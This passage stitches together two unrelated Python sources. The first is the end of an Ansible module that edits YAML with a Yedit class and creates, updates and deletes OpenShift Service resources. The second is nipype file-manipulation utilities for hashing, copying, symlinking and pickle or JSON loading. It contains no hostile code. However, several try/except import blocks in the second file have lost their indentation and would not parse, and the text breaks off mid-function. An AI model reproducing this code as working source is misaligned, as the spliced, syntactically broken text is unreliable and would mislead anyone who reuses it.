                and (opt['value'] or isinstance(opt['value'], int))]
class YeditException(Exception):
    ''' Raised by Yedit on file-write or parse failures. '''
class Yedit(object):
    ''' Class to modify yaml (or json) files via dotted-key paths.

    Keys use a configurable separator (default '.'); list elements are
    addressed as ``[N]``, e.g. ``spec.ports.[0].port``.

    Fixes vs. the previous revision:
      * the ``separator`` setter now actually assigns (it previously took
        no value argument, so ``yedit.separator = x`` raised TypeError);
      * ``dict.has_key``/``err.message`` (Python-2-only) replaced with
        ``in``/``str(err)`` — behavior is unchanged on Python 2.
    '''
    re_valid_key = r"(((\[-?\d+\])|([0-9a-zA-Z%s/_-]+)).?)+$"
    re_key = r"(?:\[(-?\d+)\])|([0-9a-zA-Z%s/_-]+)"
    # all separators we accept; the active one is excluded from the key
    # character class so the remaining ones may appear inside key names
    com_sep = set(['.', '#', '|', ':'])
    # pylint: disable=too-many-arguments
    def __init__(self, filename=None, content=None, content_type='yaml', separator='.', backup=False):
        self.content = content
        self._separator = separator
        self.filename = filename
        self.__yaml_dict = content
        self.content_type = content_type
        self.backup = backup
        self.load(content_type=self.content_type)
        if self.__yaml_dict is None:
            self.__yaml_dict = {}
    @property
    def separator(self):
        ''' getter method for separator '''
        return self._separator
    @separator.setter
    def separator(self, value):
        ''' setter method for separator '''
        self._separator = value
    @property
    def yaml_dict(self):
        ''' getter method for yaml_dict '''
        return self.__yaml_dict
    @yaml_dict.setter
    def yaml_dict(self, value):
        ''' setter method for yaml_dict '''
        self.__yaml_dict = value
    @staticmethod
    def parse_key(key, sep='.'):
        '''parse the key into (list-index, dict-key) tuples, allowing the
        appropriate separator'''
        common_separators = list(Yedit.com_sep - set([sep]))
        return re.findall(Yedit.re_key % ''.join(common_separators), key)
    @staticmethod
    def valid_key(key, sep='.'):
        '''validate the incoming key against re_valid_key'''
        common_separators = list(Yedit.com_sep - set([sep]))
        if not re.match(Yedit.re_valid_key % ''.join(common_separators), key):
            return False
        return True
    @staticmethod
    def remove_entry(data, key, sep='.'):
        ''' remove data at location key; returns True on removal,
        None when the path cannot be resolved '''
        if key == '' and isinstance(data, dict):
            data.clear()
            return True
        elif key == '' and isinstance(data, list):
            del data[:]
            return True
        if not (key and Yedit.valid_key(key, sep)) and isinstance(data, (list, dict)):
            return None
        key_indexes = Yedit.parse_key(key, sep)
        # walk down to the parent of the entry being removed
        for arr_ind, dict_key in key_indexes[:-1]:
            if dict_key and isinstance(data, dict):
                data = data.get(dict_key, None)
            elif arr_ind and isinstance(data, list) and int(arr_ind) <= len(data) - 1:
                data = data[int(arr_ind)]
            else:
                return None
        # process last index for remove
        # expected list entry
        if key_indexes[-1][0]:
            if isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1:
                del data[int(key_indexes[-1][0])]
                return True
        # expected dict entry
        elif key_indexes[-1][1]:
            if isinstance(data, dict):
                del data[key_indexes[-1][1]]
                return True
    @staticmethod
    def add_entry(data, key, item=None, sep='.'):
        ''' Add an entry into a dictionary with key notation a.b.c,
        creating intermediate dicts as needed.
            d = {'a': {'b': 'c'}}
            key = a#b
            return c
        '''
        if key == '':
            pass
        elif not (key and Yedit.valid_key(key, sep)) and isinstance(data, (list, dict)):
            return None
        key_indexes = Yedit.parse_key(key, sep)
        for arr_ind, dict_key in key_indexes[:-1]:
            if dict_key:
                if isinstance(data, dict) and dict_key in data and data[dict_key]:
                    data = data[dict_key]
                    continue
                elif data and not isinstance(data, dict):
                    return None
                # create the intermediate dict on the way down
                data[dict_key] = {}
                data = data[dict_key]
            elif arr_ind and isinstance(data, list) and int(arr_ind) <= len(data) - 1:
                data = data[int(arr_ind)]
            else:
                return None
        if key == '':
            data = item
        # process last index for add
        # expected list entry
        elif key_indexes[-1][0] and isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1:
            data[int(key_indexes[-1][0])] = item
        # expected dict entry
        elif key_indexes[-1][1] and isinstance(data, dict):
            data[key_indexes[-1][1]] = item
        return data
    @staticmethod
    def get_entry(data, key, sep='.'):
        ''' Get an item from a dictionary with key notation a.b.c
            d = {'a': {'b': 'c'}}
            key = a.b
            return c
        '''
        if key == '':
            pass
        elif not (key and Yedit.valid_key(key, sep)) and isinstance(data, (list, dict)):
            return None
        key_indexes = Yedit.parse_key(key, sep)
        for arr_ind, dict_key in key_indexes:
            if dict_key and isinstance(data, dict):
                data = data.get(dict_key, None)
            elif arr_ind and isinstance(data, list) and int(arr_ind) <= len(data) - 1:
                data = data[int(arr_ind)]
            else:
                return None
        return data
    def write(self):
        ''' write yaml_dict to self.filename (atomically, via a .yedit
        temp file); raises YeditException when no filename is set '''
        if not self.filename:
            raise YeditException('Please specify a filename.')
        if self.backup and self.file_exists():
            shutil.copy(self.filename, self.filename + '.orig')
        tmp_filename = self.filename + '.yedit'
        try:
            with open(tmp_filename, 'w') as yfd:
                # pylint: disable=no-member,maybe-no-member
                if hasattr(self.yaml_dict, 'fa'):
                    self.yaml_dict.fa.set_block_style()
                yfd.write(yaml.dump(self.yaml_dict, Dumper=yaml.RoundTripDumper))
        except Exception as err:
            raise YeditException(str(err))
        os.rename(tmp_filename, self.filename)
        return (True, self.yaml_dict)
    def read(self):
        ''' read raw contents from file; None when no file '''
        # check if it exists
        if self.filename is None or not self.file_exists():
            return None
        contents = None
        with open(self.filename) as yfd:
            contents = yfd.read()
        return contents
    def file_exists(self):
        ''' return whether self.filename exists '''
        if os.path.exists(self.filename):
            return True
        return False
    def load(self, content_type='yaml'):
        ''' load yaml_dict from self.content or from file '''
        contents = self.read()
        if not contents and not self.content:
            return None
        if self.content:
            # an already-parsed dict wins over any file contents
            if isinstance(self.content, dict):
                self.yaml_dict = self.content
                return self.yaml_dict
            elif isinstance(self.content, str):
                contents = self.content
        # check if it is yaml
        try:
            if content_type == 'yaml' and contents:
                self.yaml_dict = yaml.load(contents, yaml.RoundTripLoader)
                # pylint: disable=no-member,maybe-no-member
                if hasattr(self.yaml_dict, 'fa'):
                    self.yaml_dict.fa.set_block_style()
            elif content_type == 'json' and contents:
                self.yaml_dict = json.loads(contents)
        except yaml.YAMLError as err:
            # Error loading yaml or json
            raise YeditException('Problem with loading yaml file. %s' % err)
        return self.yaml_dict
    def get(self, key):
        ''' get a specified key; None when not found '''
        try:
            entry = Yedit.get_entry(self.yaml_dict, key, self.separator)
        except KeyError as _:
            entry = None
        return entry
    def pop(self, path, key_or_item):
        ''' remove a key, value pair from a dict or an item from a list;
        returns (changed, yaml_dict) '''
        try:
            entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
        except KeyError as _:
            entry = None
        if entry is None:
            return (False, self.yaml_dict)
        if isinstance(entry, dict):
            # pylint: disable=no-member,maybe-no-member
            if key_or_item in entry:
                entry.pop(key_or_item)
                return (True, self.yaml_dict)
            return (False, self.yaml_dict)
        elif isinstance(entry, list):
            # pylint: disable=no-member,maybe-no-member
            ind = None
            try:
                ind = entry.index(key_or_item)
            except ValueError:
                return (False, self.yaml_dict)
            entry.pop(ind)
            return (True, self.yaml_dict)
        return (False, self.yaml_dict)
    def delete(self, path):
        ''' remove path from the dict; returns (changed, yaml_dict) '''
        try:
            entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
        except KeyError as _:
            entry = None
        if entry is None:
            return (False, self.yaml_dict)
        result = Yedit.remove_entry(self.yaml_dict, path, self.separator)
        if not result:
            return (False, self.yaml_dict)
        return (True, self.yaml_dict)
    def exists(self, path, value):
        ''' check if value exists at path '''
        try:
            entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
        except KeyError as _:
            entry = None
        if isinstance(entry, list):
            if value in entry:
                return True
            return False
        elif isinstance(entry, dict):
            if isinstance(value, dict):
                # NOTE(review): raises KeyError if a key in `value` is
                # missing from `entry` — pre-existing behavior, preserved.
                rval = False
                for key, val in value.items():
                    if entry[key] != val:
                        rval = False
                        break
                    else:
                        rval = True
                return rval
            return value in entry
        return entry == value
    def append(self, path, value):
        '''append value to the list at path, creating it when absent '''
        try:
            entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
        except KeyError as _:
            entry = None
        if entry is None:
            self.put(path, [])
            entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
        if not isinstance(entry, list):
            return (False, self.yaml_dict)
        # pylint: disable=no-member,maybe-no-member
        entry.append(value)
        return (True, self.yaml_dict)
    # pylint: disable=too-many-arguments
    def update(self, path, value, index=None, curr_value=None):
        ''' put path, value into a dict (merge) or update/append within a
        list, addressed by index or by current value '''
        try:
            entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
        except KeyError as _:
            entry = None
        if isinstance(entry, dict):
            # pylint: disable=no-member,maybe-no-member
            if not isinstance(value, dict):
                raise YeditException('Cannot replace key, value entry in dict with non-dict type.' \
                                     ' value=[%s] [%s]' % (value, type(value)))
            entry.update(value)
            return (True, self.yaml_dict)
        elif isinstance(entry, list):
            # pylint: disable=no-member,maybe-no-member
            ind = None
            if curr_value:
                try:
                    ind = entry.index(curr_value)
                except ValueError:
                    return (False, self.yaml_dict)
            elif index is not None:
                ind = index
            if ind is not None and entry[ind] != value:
                entry[ind] = value
                return (True, self.yaml_dict)
            # see if it exists in the list
            try:
                ind = entry.index(value)
            except ValueError:
                # doesn't exist, append it
                entry.append(value)
                return (True, self.yaml_dict)
            #already exists, return
            if ind is not None:
                return (False, self.yaml_dict)
        return (False, self.yaml_dict)
    def put(self, path, value):
        ''' put path, value into the dict; returns (changed, yaml_dict) '''
        try:
            entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
        except KeyError as _:
            entry = None
        if entry == value:
            return (False, self.yaml_dict)
        # deepcopy didn't work; round-trip through yaml to preserve
        # ruamel's comment/format attributes
        tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict, default_flow_style=False), yaml.RoundTripLoader)
        # pylint: disable=no-member
        if hasattr(self.yaml_dict, 'fa'):
            tmp_copy.fa.set_block_style()
        result = Yedit.add_entry(tmp_copy, path, value, self.separator)
        if not result:
            return (False, self.yaml_dict)
        self.yaml_dict = tmp_copy
        return (True, self.yaml_dict)
    def create(self, path, value):
        ''' create the backing yaml file with path=value, only when the
        file does not already exist '''
        if not self.file_exists():
            # deepcopy didn't work; round-trip through yaml instead
            tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict, default_flow_style=False), yaml.RoundTripLoader)
            # pylint: disable=no-member
            if hasattr(self.yaml_dict, 'fa'):
                tmp_copy.fa.set_block_style()
            result = Yedit.add_entry(tmp_copy, path, value, self.separator)
            if result:
                self.yaml_dict = tmp_copy
                return (True, self.yaml_dict)
        return (False, self.yaml_dict)
# pylint: disable=too-many-instance-attributes
class ServiceConfig(object):
    ''' Builds the dict representation of a v1 Service resource. '''
    # pylint: disable=too-many-arguments
    def __init__(self,
                 sname,
                 namespace,
                 ports,
                 selector=None,
                 labels=None,
                 cluster_ip=None,
                 portal_ip=None,
                 session_affinity=None,
                 service_type=None):
        ''' Capture the service options and immediately build self.data. '''
        self.name = sname
        self.namespace = namespace
        self.ports = ports
        self.selector = selector
        self.labels = labels
        self.cluster_ip = cluster_ip
        self.portal_ip = portal_ip
        self.session_affinity = session_affinity
        self.service_type = service_type
        self.data = {}
        self.create_dict()
    def create_dict(self):
        ''' populate self.data with a v1 Service definition '''
        metadata = {'name': self.name, 'namespace': self.namespace}
        # labels are merged straight into metadata, one key per label
        for lab, lab_value in (self.labels or {}).items():
            metadata[lab] = lab_value
        spec = {}
        spec['ports'] = self.ports or []
        if self.selector:
            spec['selector'] = self.selector
        # sessionAffinity defaults to the literal string 'None'
        spec['sessionAffinity'] = self.session_affinity or 'None'
        if self.cluster_ip:
            spec['clusterIP'] = self.cluster_ip
        if self.portal_ip:
            spec['portalIP'] = self.portal_ip
        if self.service_type:
            spec['type'] = self.service_type
        self.data['apiVersion'] = 'v1'
        self.data['kind'] = 'Service'
        self.data['metadata'] = metadata
        self.data['spec'] = spec
# pylint: disable=too-many-instance-attributes,too-many-public-methods
class Service(Yedit):
    ''' Yedit subclass with Service-specific accessors. '''
    port_path = "spec.ports"
    portal_ip = "spec.portalIP"
    cluster_ip = "spec.clusterIP"
    kind = 'Service'
    def __init__(self, content):
        '''Initialize from an existing service definition dict.'''
        super(Service, self).__init__(content=content)
    def get_ports(self):
        ''' return the port list, or an empty list when unset '''
        return self.get(Service.port_path) or []
    def add_ports(self, inc_ports):
        ''' append one or more port objects to the ports list '''
        new_ports = inc_ports if isinstance(inc_ports, list) else [inc_ports]
        existing = self.get_ports()
        if existing:
            existing.extend(new_ports)
        else:
            self.put(Service.port_path, new_ports)
        return True
    def find_ports(self, inc_port):
        ''' return the first port whose 'port' value matches, else None '''
        for candidate in self.get_ports():
            if candidate['port'] == inc_port['port']:
                return candidate
        return None
    def delete_ports(self, inc_ports):
        ''' drop matching ports; True when something was removed (or the
        service had no ports at all) '''
        if not isinstance(inc_ports, list):
            inc_ports = [inc_ports]
        current = self.get(Service.port_path) or []
        if not current:
            return True
        removed = False
        for wanted in inc_ports:
            match = self.find_ports(wanted)
            if match:
                current.remove(match)
                removed = True
        return removed
    def add_cluster_ip(self, sip):
        '''set spec.clusterIP'''
        self.put(Service.cluster_ip, sip)
    def add_portal_ip(self, pip):
        '''set spec.portalIP'''
        self.put(Service.portal_ip, pip)
# pylint: disable=too-many-instance-attributes
class OCService(OpenShiftCLI):
    ''' Wrapper of the oc command line for the `service` resource kind '''
    kind = 'service'
    # pylint allows 5
    # pylint: disable=too-many-arguments
    def __init__(self,
                 sname,
                 namespace,
                 labels,
                 selector,
                 cluster_ip,
                 portal_ip,
                 ports,
                 session_affinity,
                 service_type,
                 kubeconfig='/etc/origin/master/admin.kubeconfig',
                 verbose=False):
        ''' Constructor for OCService '''
        super(OCService, self).__init__(namespace, kubeconfig)
        self.namespace = namespace
        # user_svc: the desired state built from the module params
        self.config = ServiceConfig(sname, namespace, ports, selector, labels,
                                    cluster_ip, portal_ip, session_affinity, service_type)
        self.user_svc = Service(content=self.config.data)
        # svc: lazily-fetched current state from the cluster (see `service`)
        self.svc = None
    @property
    def service(self):
        ''' lazily fetch and cache the current service from the cluster '''
        if not self.svc:
            self.get()
        return self.svc
    @service.setter
    def service(self, data):
        ''' setter function for the cached service '''
        self.svc = data
    def exists(self):
        ''' return whether the service exists on the cluster '''
        if self.service:
            return True
        return False
    def get(self):
        '''return service information '''
        result = self._get(self.kind, self.config.name)
        if result['returncode'] == 0:
            self.service = Service(content=result['results'][0])
            result['clusterip'] = self.service.get('spec.clusterIP')
        elif 'services \"%s\" not found' % self.config.name in result['stderr']:
            # not-found is not an error here; report an empty clusterip
            result['clusterip'] = ''
        return result
    def delete(self):
        '''delete the service'''
        return self._delete(self.kind, self.config.name)
    def create(self):
        '''create a service '''
        return self._create_from_content(self.config.name, self.user_svc.yaml_dict)
    def update(self):
        '''replace the live service with the desired definition '''
        # Need to copy over the portalIP and the serviceIP settings
        self.user_svc.add_cluster_ip(self.service.get('spec.clusterIP'))
        self.user_svc.add_portal_ip(self.service.get('spec.portalIP'))
        return self._replace_content(self.kind, self.config.name, self.user_svc.yaml_dict)
    def needs_update(self):
        ''' verify an update is needed '''
        # clusterIP/portalIP are assigned by the cluster, so ignore them
        skip = ['clusterIP', 'portalIP']
        return not Utils.check_def_equal(self.user_svc.yaml_dict, self.service.yaml_dict, skip_keys=skip, debug=True)
def main():
    '''
    ansible oc module for services

    Supported states: list, absent, present (create or update).
    Exits via module.exit_json/fail_json in every branch.
    '''
    # AnsibleModule is provided by the wildcard import at the bottom of
    # this file (ansible.module_utils.basic).
    module = AnsibleModule(
        argument_spec=dict(
            kubeconfig=dict(default='/etc/origin/master/admin.kubeconfig', type='str'),
            state=dict(default='present', type='str',
                       choices=['present', 'absent', 'list']),
            debug=dict(default=False, type='bool'),
            namespace=dict(default='default', type='str'),
            name=dict(default=None, type='str'),
            labels=dict(default=None, type='dict'),
            selector=dict(default=None, type='dict'),
            clusterip=dict(default=None, type='str'),
            portalip=dict(default=None, type='str'),
            ports=dict(default=None, type='list'),
            session_affinity=dict(default='None', type='str'),
            service_type=dict(default='ClusterIP', type='str'),
        ),
        supports_check_mode=True,
    )
    oc_svc = OCService(module.params['name'],
                       module.params['namespace'],
                       module.params['labels'],
                       module.params['selector'],
                       module.params['clusterip'],
                       module.params['portalip'],
                       module.params['ports'],
                       module.params['session_affinity'],
                       module.params['service_type'])
    state = module.params['state']
    api_rval = oc_svc.get()
    #####
    # Get
    #####
    if state == 'list':
        module.exit_json(changed=False, results=api_rval, state="list")
    ########
    # Delete
    ########
    if state == 'absent':
        if oc_svc.exists():
            if module.check_mode:
                module.exit_json(changed=False, msg='Would have performed a delete.')
            api_rval = oc_svc.delete()
            module.exit_json(changed=True, results=api_rval, state="absent")
        module.exit_json(changed=False, state="absent")
    if state == 'present':
        ########
        # Create
        ########
        if not oc_svc.exists():
            if module.check_mode:
                module.exit_json(changed=False, msg='Would have performed a create.')
            # Create it here
            api_rval = oc_svc.create()
            if api_rval['returncode'] != 0:
                module.fail_json(msg=api_rval)
            # return the created object
            api_rval = oc_svc.get()
            if api_rval['returncode'] != 0:
                module.fail_json(msg=api_rval)
            module.exit_json(changed=True, results=api_rval, state="present")
        ########
        # Update
        ########
        if oc_svc.needs_update():
            api_rval = oc_svc.update()
            if api_rval['returncode'] != 0:
                module.fail_json(msg=api_rval)
            # return the created object
            api_rval = oc_svc.get()
            if api_rval['returncode'] != 0:
                module.fail_json(msg=api_rval)
            module.exit_json(changed=True, results=api_rval, state="present")
        # already present and up to date
        module.exit_json(changed=False, results=api_rval, state="present")
    # unreachable for valid states (argument_spec restricts choices)
    module.exit_json(failed=True,
                     changed=False,
                     results='Unknown state passed. %s' % state,
                     state="unknown")
# pylint: disable=redefined-builtin, unused-wildcard-import, wildcard-import, locally-disabled
# import module snippets. These are required
from ansible.module_utils.basic import *
main()
| |
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""Miscellaneous file manipulation functions
"""
import cPickle
from glob import glob
import gzip
import os
import re
import shutil
# The md5 module is deprecated in Python 2.6, but hashlib is only
# available as an external package for versions of python before 2.6.
# Both md5 algorithms appear to return the same result.
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
# json included in Python 2.6
import json
except ImportError:
# simplejson is the json module that was included in 2.6 (I
# believe). Used here for Python 2.5
import simplejson as json
import numpy as np
from nipype.interfaces.traits_extension import isdefined
from nipype.utils.misc import is_container
from .. import logging, config
fmlogger = logging.getLogger("filemanip")
class FileNotFoundError(Exception):
    """Raised when an expected file cannot be found.

    NOTE(review): shadows the Python 3 builtin of the same name; this file
    targets Python 2 where no such builtin exists.
    """
    pass
def split_filename(fname):
    """Split a filename into parts: path, base filename and extension.

    Compound extensions such as ``.nii.gz`` are kept together instead of
    being split at the last dot.

    Parameters
    ----------
    fname : str
        file or path name

    Returns
    -------
    pth : str
        base path from fname
    fname : str
        filename from fname, without extension
    ext : str
        file extension from fname

    Examples
    --------
    >>> pth, fname, ext = split_filename('/home/data/subject.nii.gz')
    >>> (pth, fname, ext)
    ('/home/data', 'subject', '.nii.gz')
    """
    pth, fname = os.path.split(fname)
    ext = None
    # Check the known multi-part extensions first; fall back to splitext.
    for special_ext in ('.nii.gz', '.tar.gz'):
        nchars = len(special_ext)
        if len(fname) > nchars and fname[-nchars:].lower() == special_ext.lower():
            ext = fname[-nchars:]
            fname = fname[:-nchars]
            break
    if not ext:
        fname, ext = os.path.splitext(fname)
    return pth, fname, ext
def fname_presuffix(fname, prefix='', suffix='', newpath=None, use_ext=True):
    """Manipulates path and name of input filename

    Parameters
    ----------
    fname : string
        A filename (may or may not include path)
    prefix : string
        Characters to prepend to the filename
    suffix : string
        Characters to append to the filename
    newpath : string
        Path to replace the path of the input fname
    use_ext : boolean
        If True (default), appends the extension of the original file
        to the output name.

    Returns
    -------
    Path of the modified filename

    >>> fname_presuffix('foo.nii.gz', 'pre', 'post', '/tmp')
    '/tmp/prefoopost.nii.gz'
    """
    pth, base, ext = split_filename(fname)
    if not use_ext:
        ext = ''
    # `newpath and ...` keeps the short-circuit for None/'' before the
    # isdefined() traits check.
    if newpath and isdefined(newpath):
        pth = os.path.abspath(newpath)
    return os.path.join(pth, prefix + base + suffix + ext)
def fnames_presuffix(fnames, prefix='', suffix='', newpath=None, use_ext=True):
    """Apply :func:`fname_presuffix` to every filename in *fnames*."""
    return [fname_presuffix(fname, prefix, suffix, newpath, use_ext)
            for fname in fnames]
def hash_rename(filename, hash):
    """Insert an ``_0x<hash>`` marker before the extension of *filename*.

    Keeps the original directory component unchanged.
    """
    path, name, ext = split_filename(filename)
    marked = '%s_0x%s%s' % (name, hash, ext)
    return os.path.join(path, marked)
def check_forhash(filename):
    """Check whether *filename* carries an embedded ``_0x<32 hex>`` hash.

    Returns ``(True, [markers])`` when found, ``(False, None)`` otherwise.
    A list input is inspected via its first element.
    """
    if isinstance(filename, list):
        filename = filename[0]
    _, name = os.path.split(filename)
    found = re.findall('(_0x[a-z0-9]{32})', name)
    if found:
        return True, found
    return False, None
def hash_infile(afile, chunk_len=8192):
    """Compute the md5 hex digest of a file's contents.

    Parameters
    ----------
    afile : str
        path to the file; returns None when it is not a regular file
    chunk_len : int
        read size in bytes, so large files are hashed incrementally

    Returns
    -------
    str or None
        hex digest, or None if *afile* is not a file
    """
    md5hex = None
    if os.path.isfile(afile):
        md5obj = md5()
        # open() instead of the removed-in-Python-3 file() builtin, and a
        # context manager so the handle is closed even if a read fails.
        with open(afile, 'rb') as fp:
            while True:
                data = fp.read(chunk_len)
                if not data:
                    break
                md5obj.update(data)
        md5hex = md5obj.hexdigest()
    return md5hex
def hash_timestamp(afile):
    """Compute an md5 hash of the size and mtime of a file.

    Much cheaper than hashing the contents; used as a fast change detector.
    Returns None when *afile* is not a regular file.
    """
    md5hex = None
    if os.path.isfile(afile):
        md5obj = md5()
        stat = os.stat(afile)
        # .encode(): hashlib requires bytes on Python 3; the ASCII encode is
        # a no-op for the digit strings produced here on Python 2.
        md5obj.update(str(stat.st_size).encode())
        md5obj.update(str(stat.st_mtime).encode())
        md5hex = md5obj.hexdigest()
    return md5hex
def copyfile(originalfile, newfile, copy=False, create_new=False, hashmethod=None):
    """Copy or symlink ``originalfile`` to ``newfile``.

    Parameters
    ----------
    originalfile : str
        full path to original file
    newfile : str
        full path to new file
    copy : Bool
        specifies whether to copy or symlink files
        (default=False) but only for POSIX systems
    create_new : Bool
        if True, never overwrite: pick a fresh ``_cNNNN``-suffixed name
        when ``newfile`` already exists
    hashmethod : str or None
        'timestamp' or 'content'; read from config when None

    Returns
    -------
    newfile : str
        path actually written (may differ from the input when create_new)
    """
    newhash = None
    orighash = None
    fmlogger.debug(newfile)

    if create_new:
        # Bump a _cNNNN counter until we find an unused name.
        while os.path.exists(newfile):
            base, fname, ext = split_filename(newfile)
            s = re.search('_c[0-9]{4,4}$', fname)
            i = 0
            if s:
                i = int(s.group()[2:]) + 1
                fname = fname[:-6] + "_c%04d" % i
            else:
                fname += "_c%04d" % i
            newfile = base + os.sep + fname + ext
    if hashmethod is None:
        hashmethod = config.get('execution', 'hash_method').lower()
    # NOTE(review): because of this elif, the existing-file hash is only
    # computed when hashmethod was passed explicitly — looks suspicious,
    # preserved as-is; confirm intent against callers.
    elif os.path.exists(newfile):
        if hashmethod == 'timestamp':
            newhash = hash_timestamp(newfile)
        elif hashmethod == 'content':
            newhash = hash_infile(newfile)
        fmlogger.debug("File: %s already exists,%s, copy:%d" \
                       % (newfile, newhash, copy))
    #the following seems unnecessary
    #if os.name is 'posix' and copy:
    #    if os.path.lexists(newfile) and os.path.islink(newfile):
    #        os.unlink(newfile)
    #        newhash = None
    # BUG FIX: compare strings with ==, not the identity operator `is`,
    # which only happens to work through CPython string interning.
    if os.name == 'posix' and not copy:
        if os.path.lexists(newfile):
            if hashmethod == 'timestamp':
                orighash = hash_timestamp(originalfile)
            elif hashmethod == 'content':
                orighash = hash_infile(originalfile)
            fmlogger.debug('Original hash: %s, %s' % (originalfile, orighash))
            if newhash != orighash:
                os.unlink(newfile)
        if (newhash is None) or (newhash != orighash):
            os.symlink(originalfile, newfile)
    else:
        if newhash:
            if hashmethod == 'timestamp':
                orighash = hash_timestamp(originalfile)
            elif hashmethod == 'content':
                orighash = hash_infile(originalfile)
        if (newhash is None) or (newhash != orighash):
            try:
                fmlogger.debug("Copying File: %s->%s" \
                               % (newfile, originalfile))
                shutil.copyfile(originalfile, newfile)
            # `except E as e` (Py2.6+/Py3) replaces the Py2-only comma form;
            # str(e) replaces the deprecated/Py3-removed e.message.
            except shutil.Error as e:
                fmlogger.warn(str(e))
        else:
            fmlogger.debug("File: %s already exists, not overwriting, copy:%d" \
                           % (newfile, copy))
    # Carry sidecar files along for Analyze (.img/.hdr/.mat) and AFNI BRIK.
    if originalfile.endswith(".img"):
        hdrofile = originalfile[:-4] + ".hdr"
        hdrnfile = newfile[:-4] + ".hdr"
        matofile = originalfile[:-4] + ".mat"
        if os.path.exists(matofile):
            matnfile = newfile[:-4] + ".mat"
            copyfile(matofile, matnfile, copy)
        copyfile(hdrofile, hdrnfile, copy)
    elif originalfile.endswith(".BRIK"):
        hdrofile = originalfile[:-4] + ".HEAD"
        hdrnfile = newfile[:-4] + ".HEAD"
        copyfile(hdrofile, hdrnfile, copy)
    return newfile
def copyfiles(filelist, dest, copy=False, create_new=False):
    """Copy or symlink files in ``filelist`` to ``dest`` directory.

    Parameters
    ----------
    filelist : list
        List of files to copy.
    dest : path/files
        full path to destination. If it is a list of length greater
        than 1, then it assumes that these are the names of the new
        files.
    copy : Bool
        specifies whether to copy or symlink files
        (default=False) but only for posix systems

    Returns
    -------
    newfiles : list
        destination paths actually written
    """
    outfiles = filename_to_list(dest)
    newfiles = []
    for idx, fname in enumerate(filename_to_list(filelist)):
        if isinstance(fname, list):
            # Nested lists are copied recursively, preserving structure.
            newfiles.insert(idx, copyfiles(fname, dest,
                                           copy=copy, create_new=create_new))
        else:
            if len(outfiles) > 1:
                destfile = outfiles[idx]
            else:
                destfile = fname_presuffix(fname, newpath=outfiles[0])
            destfile = copyfile(fname, destfile, copy, create_new=create_new)
            newfiles.insert(idx, destfile)
    return newfiles
def filename_to_list(filename):
    """Return *filename* normalized to a list.

    Strings become a one-element list; lists pass through; other containers
    are expanded; anything else yields None.
    """
    # `unicode` only exists on Python 2; guard so this also runs on
    # Python 3, where `str` covers all text.
    try:
        string_types = (str, unicode)
    except NameError:
        string_types = (str,)
    if isinstance(filename, string_types):
        return [filename]
    elif isinstance(filename, list):
        return filename
    elif is_container(filename):
        return [x for x in filename]
    else:
        return None
def list_to_filename(filelist):
    """Collapse a one-element list to its element; longer lists pass through."""
    return filelist if len(filelist) > 1 else filelist[0]
def cleandir(dir):
    """Cleans all nifti, img/hdr, txt and matfiles from dir"""
    for pattern in ('*.nii', '*.nii.gz', '*.txt', '*.img',
                    '*.hdr', '*.mat', '*.json'):
        for fname in glob(os.path.join(dir, pattern)):
            os.remove(fname)
def save_json(filename, data):
    """Save data to a json file

    Parameters
    ----------
    filename : str
        Filename to save data in.
    data : dict
        Dictionary to save in json file.
    """
    # open() instead of the removed-in-Python-3 file() builtin; the context
    # manager guarantees the handle closes even if serialization raises.
    with open(filename, 'w') as fp:
        json.dump(data, fp, sort_keys=True, indent=4)
def debuglog(inputlines, filename='/tmp/dbginputs.txt'):
    """Append *inputlines* to a scratch debug log (text append mode)."""
    with open(filename, 'at') as fp:
        fp.writelines(inputlines)
def load_json(filename):
    """Load data from a json file

    Parameters
    ----------
    filename : str
        Filename to load data from.

    Returns
    -------
    data : dict
    """
    # open() instead of the removed-in-Python-3 file() builtin; context
    # manager closes the handle even if parsing raises.
    with open(filename, 'r') as fp:
        data = json.load(fp)
    return data
def loadflat(infile, *args):
    """Load an npz file into a dict of flattened values.

    With *args*, only those variables are loaded (missing names raise
    IOError). Single-element arrays are collapsed to the bare element.
    """
    data = np.load(infile)
    if args:
        outargs = np.setdiff1d(args, data.files)
        if outargs:
            raise IOError('File does not contain variables: ' + str(outargs))
    out = {}
    for key in data.files:
        if not args or key in args:
            values = [item for item in data[key].flat]
            out[key] = values.pop() if len(values) == 1 else values
    return out
def loadcrash(infile, *args):
    """Load a crash dump: pickle files go through loadpkl, others loadflat."""
    if '.pkl' in infile:
        return loadpkl(infile)
    return loadflat(infile, *args)
def loadpkl(infile):
    """Load a zipped or plain cPickled file

    Files ending in ``pklz`` are assumed to be gzip-compressed.
    """
    # cPickle only exists on Python 2; pickle is the Python 3 equivalent.
    try:
        import cPickle as pickle
    except ImportError:
        import pickle
    if infile.endswith('pklz'):
        pkl_file = gzip.open(infile, 'rb')
    else:
        # 'rb': pickle data is binary; text mode breaks on Python 3 and the
        # original also leaked the handle — close it in all cases.
        pkl_file = open(infile, 'rb')
    try:
        return pickle.load(pkl_file)
    finally:
        pkl_file.close()
def savepkl(filename, record):
    """Pickle *record* to *filename*; gzip-compress when it ends in pklz."""
    # cPickle only exists on Python 2; pickle is the Python 3 equivalent.
    try:
        import cPickle as pickle
    except ImportError:
        import pickle
    if filename.endswith('pklz'):
        pkl_file = gzip.open(filename, 'wb')
    else:
        pkl_file = open(filename, 'wb')
    # try/finally so the handle is closed even when serialization fails.
    try:
        pickle.dump(record, pkl_file)
    finally:
        pkl_file.close()
# Underline characters for rST heading levels 0-3.
rst_levels = ['=', '-', '~', '+']

def write_rst_header(header, level=0):
    """Render *header* as an rST heading underlined for the given level."""
    underline = rst_levels[level] * len(header)
    return '\n'.join((header, underline)) + '\n\n'
def write_rst_list(items, prefix=''):
    """Render *items* one per line, each preceded by *prefix* and a space."""
    rendered = [prefix + ' ' + str(item) for item in items]
